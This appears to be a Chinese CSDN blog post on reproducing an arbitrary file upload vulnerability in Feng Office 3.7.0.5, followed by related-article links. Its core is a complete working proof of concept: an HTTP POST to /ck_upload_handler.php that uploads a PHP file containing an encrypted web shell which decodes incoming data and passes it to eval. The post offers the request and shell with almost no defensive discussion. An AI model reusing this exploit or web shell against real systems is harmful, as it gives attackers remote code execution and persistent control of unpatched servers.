Feng Office3.7.0.5任意文件上传漏洞复现

已于 2023-01-29 19:39:58 修改
阅读量411 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全 安全
于 2023-01-27 01:22:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47533648/article/details/128768801
版权

2023年将会持续于B站、CSDN等各大平台更新,可加入粉丝群与博主交流:838681355,为了老板大G共同努力。

特征一:小绿标

在这里插入图片描述

特征二:登录页面

在这里插入图片描述

验证过程

POC:
POST /ck_upload_handler.php HTTP/1.1
Host: <IP>
Content-Length: 791
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: <IP>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE7DSCkF65FIKmwix
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: <IP>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryE7DSCkF65FIKmwix
Content-Disposition: form-data; name="upload"; filename="CllmsyK.php"
Content-Type: application/octet-stream

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b";
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

------WebKitFormBoundaryE7DSCkF65FIKmwix--

在这里插入图片描述

Cllmsy_K
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Feng Office 3.7.0.5 - 文件上传
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
11-20 755
【代码】Feng Office 3.7.0.5 - 文件上传
Feng Office
03-19
基于PHP的开源OA系统,支持二次开发,Feng Office是一个开源的在线协作系统,采用B/S架构,运用php语言开发而成。
fengoffice
05-13
基于LAMP的开源软件,应用于办公自动化。
Feng Office 甘特图 jsGantt
01-06
Feng Office 3.0.1版本,甘特图 jsGantt
FengOffice使用教程
08-01
ppt类型的FengOffice使用教程
NoSQL.Manager.for.MongoDB.v.3.1.0.5
12-07
- `nosql.manager.for.mongodb.v.3.1.0.5-patch.exe`:可能是针对该版本 NoSQL Manager 的补丁程序,用于修复问题或增加新功能。 - `URET NFO v2.2.exe` 和 `URET.nfo`:这些文件通常是 P2P 文件分享中包含的信息...
feng-0.1.99.1.tar.gz_ feng-0.1.99.1.tar_For Real_feng-0.1.99.1_r
09-23
Fengs是实现RTSP协议的流媒体服务器.Feng is a multimedia streaming server that is compliant with the IETF s standards for real-time streaming of multimedia content over the Internet. Feng implements ...
feng-0.1.99.1.rar
09-07
在实际使用中,首先需要解压“feng-0.1.99.1.rar”,然后使用编译工具(如GCC)编译源代码,生成可执行文件。运行程序并连接到相应的RTSP服务器,即可进行调试和测试。为了更好地理解和学习,可以对照RTSP协议的RFC...
基于PHP的Feng Office php在线协作系统.zip
最新发布
07-20
通过下载并解压这个".zip"文件,用户能够深入了解Feng Office的架构,并根据自己的需求进行定制和部署。 【标签】"php"表明了Feng Office的开发语言,PHP是一种广泛使用的服务器端脚本语言,特别适合Web开发,可...
Feng Office: Project Management and more-开源
05-10
Feng Office(以前称为OpenGoo)是一种免费且开源的在线项目管理和协作工具,已获得Affero GPL 3许可。
Feng Office简体中文语言包 v4.0
10-25
Feng office简体中文语言包v4.0由shellway翻译,适用于Feng office v1.7.5 rc2,Feng office官方提供的 v1.7.5 rc2包含还是旧的语言包,需要的朋友可以手动更新一下。
FengOffices说明手册
01-07
Feng Office是一个开源的在线协作系统,采用B/S架构,运用php语言开发而成。 Feng Office原为OpenGoo,其开发团队Feng Office Team在2009年12 月16号决定放弃原来的名称,改称Feng Office。因此,自OpenGoo1.61版开始,就改称Feng Office了。 本说明是使用的详细手册
Feng Office 2.2.4 汉化包_forsuc v1.0
04-26
智盛开源基于shellway的V3.0汉化包进行的进一步汉化。 适合于Feng Office V2.2.4. 如果发现错文,请提出,将进一步完善。
fengOffice文档管理系统安装手册
06-20
简单讲解了fengOffice文档管理系统安装的步骤,最后的安装和一般的php工程一样。
fengoffice迁移一例
weixin_34190136的博客
10-29 70
2019独角兽企业重金招聘Python工程师标准>>> ...
知识管理系统fengoffice的安装
冰月无霜
10-28 989
feng office是一个开源的知识管理系统(knowledge management system)。 1. 依赖环境:feng office运行的环境是(apache + php + mysql),在这里我使用的都是最新的版本,apache 2.2 + php 5.3 + mysql 5.1。 2. 安装步骤: 下载apache 2.2 win...
fengoffice 添加自动注册页面
jiasudu
01-11 218
fengoffice的注册页面 小弟对php不是很熟悉,对fengoffice也不是很熟悉,为了帮朋友忙,特地花了一些时间做了fengoffice的注册页面。欢迎大家提出修改意见。 步骤如下: 1 从 fengoffice/application/controllers/AccessController.class.php中 function complete_ins...
红日靶场第一关
红队是青春
11-16 7082
红日靶场第一关 一、环境配置 NET网卡(kali、windows) kali:172.16.12.187 windows:172.16.12.1 靶机win7:172.16.12.127 VMnet2网卡(内网靶机Win2K3、内网靶机Win2008 R2) 内网靶机Win2K3:192.168.52.141 内网靶机Win2008 R2:192.168.52.138 内网靶机win7:192.168.52.163 二、目标 一、环境搭建 1.环境搭建测试 2.信息收集 二、漏洞利用 3.漏洞搜集与利用
Feng, L. (2022). Application Analysis of Artificial Intelligence Algorithms in Image Processing. Mathematical Problems in Engineering, 2022. https://doi.org/10.1155/2022/7382938这是什么
05-15
这是一篇学术论文的引用,题目是《Application Analysis of Artificial Intelligence Algorithms in Image Processing》,发表在《Mathematical Problems in Engineering》杂志上,发表年份为2022年,作者为Feng, L.,文章的DOI为10.1155/2022/7382938。该论文可能涉及到人工智能在图像处理方面的应用分析。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cllmsy_K

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值